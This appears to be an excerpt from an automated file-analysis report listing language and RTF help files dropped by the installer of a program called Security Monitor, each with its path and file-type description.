Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\noPRO.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\noURL.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\norton_warning.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\scheduler.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\screenshot.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\settings.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\siteblock.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\snapshot.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\sound.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\video.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\websites.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french.lng (copy)
|
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\SN.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\activity.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\alarms.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\clipboard.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\delivery.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-2V9JN.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-448BV.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-A6IR7.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-DMK36.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-DU2DM.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-HDSBU.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-HIGLM.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-J9UP2.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-LE9H8.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-LU94I.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-N3OJT.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-PA0O2.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-S04SM.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-T6N3C.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-U7TVQ.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-UMEI7.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-VLG3I.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\keyboard.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\logging.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\noPRO.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\noURL.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\scheduler.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\screenshot.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\settings.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\siteblock.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\snapshot.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\sound.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\video.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\websites.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german.lng (copy)
|
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\SN.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\activity.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\alarms.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\clipboard.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\delivery.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-055CD.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-2840L.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-2JHGD.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-755HF.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-84SMN.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-8DDEN.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-CK6BI.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-GBT98.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-GT9M6.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-IMVBV.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-IPDVF.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-L0R1U.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-M76VA.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-R2ENR.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-RSBIE.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-VA13R.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-VNPO6.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\keyboard.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\logging.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\noPRO.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\noURL.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\scheduler.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\screenshot.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\settings.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\siteblock.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\snapshot.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\sound.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\video.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\websites.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\is-0SJ1D.tmp
|
Unicode text, UTF-8 text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\is-3TP1I.tmp
|
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\is-F7B50.tmp
|
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\is-H1SI6.tmp
|
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\is-JD3B3.tmp
|
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\is-KEH7S.tmp
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\is-LQVAK.tmp
|
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\is-T4VK4.tmp
|
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\is-UIIES.tmp
|
Unicode text, UTF-8 text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\is-UPP80.tmp
|
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\is-V01VP.tmp
|
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\is-V34TP.tmp
|
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian.lng (copy)
|
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\SN.rtf (copy)
|
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\activity.rtf (copy)
|
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\alarms.rtf (copy)
|
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\clipboard.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\delivery.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-01QFC.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-20UUV.tmp
|
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-3KKNH.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-46I3M.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-6C96I.tmp
|
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-7VGL5.tmp
|
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-8D00G.tmp
|
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-COEKT.tmp
|
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-DGK86.tmp
|
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-EUMJL.tmp
|
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-FGGGB.tmp
|
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-G8N1U.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-JJU8V.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-JM4HO.tmp
|
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-JMQT3.tmp
|
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-MQ22E.tmp
|
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-PKRPV.tmp
|
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\keyboard.rtf (copy)
|
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\logging.rtf (copy)
|
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\noPRO.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\noURL.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\scheduler.rtf (copy)
|
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\screenshot.rtf (copy)
|
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\settings.rtf (copy)
|
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\siteblock.rtf (copy)
|
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\snapshot.rtf (copy)
|
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\sound.rtf (copy)
|
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\video.rtf (copy)
|
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\websites.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\japan.lng (copy)
|
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\korean.lng (copy)
|
Unicode text, UTF-8 text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese.lng (copy)
|
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\SN.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\activity.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\alarms.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\clipboard.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\delivery.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-1A2EE.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-2HJ9K.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-355LD.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-99351.tmp
|
